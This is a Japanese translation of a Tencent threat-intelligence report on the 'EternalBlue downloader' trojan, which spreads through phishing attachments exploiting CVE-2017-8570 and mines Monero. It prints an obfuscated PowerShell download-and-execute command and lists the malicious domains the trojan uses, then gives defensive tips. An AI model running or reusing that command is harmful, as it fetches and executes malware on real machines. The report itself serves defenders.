「EternalBlue ダウンローダー トロイの木馬」は、ユーザーのマシンを使用して Monero を採掘し、拡散するためにフィッシング メールを追加します。

「EternalBlue ダウンローダー トロイの木馬」は、ユーザーのマシンを使用して Monero を採掘し、拡散するためにフィッシング メールを追加します。

出典: テンセント ユジアン 脅威インテリジェンス センター

編集者注: 元のタイトルは「フィッシングメールを通じて「Eternal Blue Downloader Trojan」が新たに拡散、添付ファイルには CVE-2017-8570 脆弱性攻撃コードが含まれている」です。

「Eternal Blue」ダウンローダー型トロイの木馬が感染したユーザーのマシン上で実行されると、現在のユーザーの電子メール アドレス帳が自動的に開き、「urgent.doc」という添付ファイル付きの文書が送信されます。この添付ファイルには、CVE-2017-8570 脆弱性 (Sandworm II とも呼ばれる、リスクの高い Office 脆弱性) に対する攻撃コードが含まれています。

攻撃を受けたユーザーが電子メールを受信し、誤ってドキュメントを開くと、脆弱性がトリガーされ、Powershell コマンドが実行され、mail.jsp がダウンロードされる可能性があります。

 C:/Windows/System32/cmd.exe /c powershell IE`x(New-Object Net.WebC`lient).DownLoadString(http://ap35nf7.jp/mail.jsp?Administrator*OUHH1)

ダウンロードに使用されたドメイン名 ap35nf7.jp は実際には登録されていませんが、アドレス t.awcna.com に解決できます。これは、感染したマシンのローカル ホスト ファイルが改ざんされ、ランダムに生成されたドメイン名がトロイの木馬が使用する悪意のあるアドレスにマッピングされるためです。詳細については、Yujian Threat Intelligence Center が以前に公開したレポート「「Eternal Blue Downloader」トロイの木馬は、ホストを改ざんしてランダムなドメイン名を指定し、複数の脆弱性を利用してイントラネット マイニングを攻撃します。」を参照してください。

この攻撃中、トロイの木馬はランダムに生成された文字とサフィックス「.cn」、「.jp」、「.kr」を DGA ドメイン名として使用し、hosts ファイル内のドメイン名を指します。

 t.tr2q.com、t.awcna.com、t.amynx.com

mail.jsp は非常に難読化されています。複数回の復号化の後、実行用の Powershell スクリプトをダウンロードするための複数のスケジュールされたタスクがインストールされ、新しいスケジュールされたタスク名「Bluetea」が使用されていることがわかります。

「EternalBlue」ダウンローダー型トロイの木馬は、最初の PE サンプル攻撃から、その後の検出回避のための Powershell ファイルレス攻撃への移行、そして複数の種類のスケジュールされたタスクをインストールすることで存続するまで、登場以来更新を止めていません。拡散方法に関しては、サプライチェーン攻撃を通じて感染マシンを大量に蓄積した後、「EternalBlue」脆弱性、MSSqlブラスト、$IPCブラスト、RDPブラストなどの方法を使用してウイルスを拡散し続けました。最近では、DGA ドメイン名攻撃とフィッシング メール攻撃も追加されました。その最終的な目標は、ユーザーのマシンを使用して Monero を採掘し、利益を得ることだけです。

EternalBlue Downloader トロイの木馬の以前のバージョンは、次の表に更新されています。

安全のヒント

1. ユーザーは、不明なソースからの電子メールの添付ファイルを簡単に開かず、電子メールの添付ファイル内のファイルを実行する際には細心の注意を払うことをお勧めします。スクリプトやその他の実行可能ファイルを見つけた場合は、まずウイルス対策ソフトウェアを使用してそれらをスキャンしてください。

2. サーバーは、特に IPC$、MSSQL、および RDP アカウントのパスワードに対して安全なパスワード ポリシーを使用します。弱いパスワードによるブルートフォース攻撃を回避するために、弱いパスワードを使用しないでください。

3. Microsoft のセキュリティ発表に従って、Office の脆弱性 CVE-2017-8570 を速やかに修正します。脆弱性のスキャンと修復が必要です。または、Windows Update が使用されます。

<<:  Filecoin はどれほどの驚きをもたらすことができるでしょうか?まず、BTCとETHとの違いを見てみましょう。

>>:  2020年第1四半期のビットコインデータの傾向をレビューした記事

推薦する

エストニア、ブロックチェーンベースの医療健康記録セキュリティプロジェクトの開始を発表

クレイジーコメント:エストニアはブロックチェーンへの投資と応用において常に他国よりはるかに先を進んで...

2020年が暗号通貨が史上最高値を更新する年となる理由

今年はほとんどの暗号通貨にとって忘れ去られる年となるでしょうが、2020 年は暗号通貨市場にとって根...

華強北のビットコイン採掘機店が次々と入れ替わり、ブロックチェーンの朗報は採掘機市場を押し上げていない

美経記者:劉玲 美経編集者:魏冠紅ブロックチェーン業界は新たな熱狂の波を迎え、仮想通貨も急騰した。そ...

ビットコインの規制は「内部は厳しく、外部は緩い」ため、多くの「鉱山」が閉鎖されている

記者 宋迪:今年初めから、ビットコインの採掘業者をターゲットにした規制運動が各地で展開されています。...

イーサリアムは道を見失ってしまったのか?

誰にとってもすべてになろうとすることで、イーサリアムは焦点を失い、結局何も達成できないという可能性は...

スリングショット フェーズ 2 のルールが発表されました。最大 500,000 FIL の報酬がもらえます!

Slingshot は、Filecoin ネットワーク上に実際の価値ある使用可能なデータを保存する...

決済システムがより集中化されるにつれて、ビットコインは世界中の旅行者にとっての解決策となるだろう

ビットコインの分散型非中央集権型プラットフォームは、集中型決済システムの観察者から引き続き注目を集め...

イーサリアムフォーク後の2つのチェーン

クレイジーな解説: イーサリアムのハードフォークは一部の人々の利益を損ない、かなりの論争を引き起こす...

Ark Invest: ETH は新たなハイブリッド資産になりつつある

序文ビットコインが信頼できるデジタル価値保存手段として、またルールに基づく金融政策を持つ唯一の資産と...

SAP、スペインからドイツへ初のブロックチェーン決済を実施

ブロックチェーン技術は、金融分野において、実験段階から実用的な概念段階へと最終的に移行することができ...

暗号通貨市場は本当に寒い冬に突入したのでしょうか?少なくとも今回の弱気相場は2018年とは大きく異なる

「市場は底を打ったのか?」それは10億ドルの価値がある質問です。 Web3 コミュニティに少し時間を...

R3CEV ブロックチェーン プロジェクトの進捗状況: 1 年以内に製品リリース予定?

R3CEVブロックチェーンプロジェクトは、世界で最も多くの銀行の支援を受けているブロックチェーンプ...

海外に行くのは簡単ではないし、海外に残ることもできない。中国の仮想通貨マイナーはジレンマに陥っている

6月19日正午、あるマイナーがWeiboで嘆いた。「今日午前0時に、四川省の800万台の負荷が一斉に...

チリのビットコイン取引所SurBTCが30万ドルの資金調達

2月5日、チリのビットコイン取引所SurBTCはシードラウンドの資金調達で30万ドルを調達した。参加...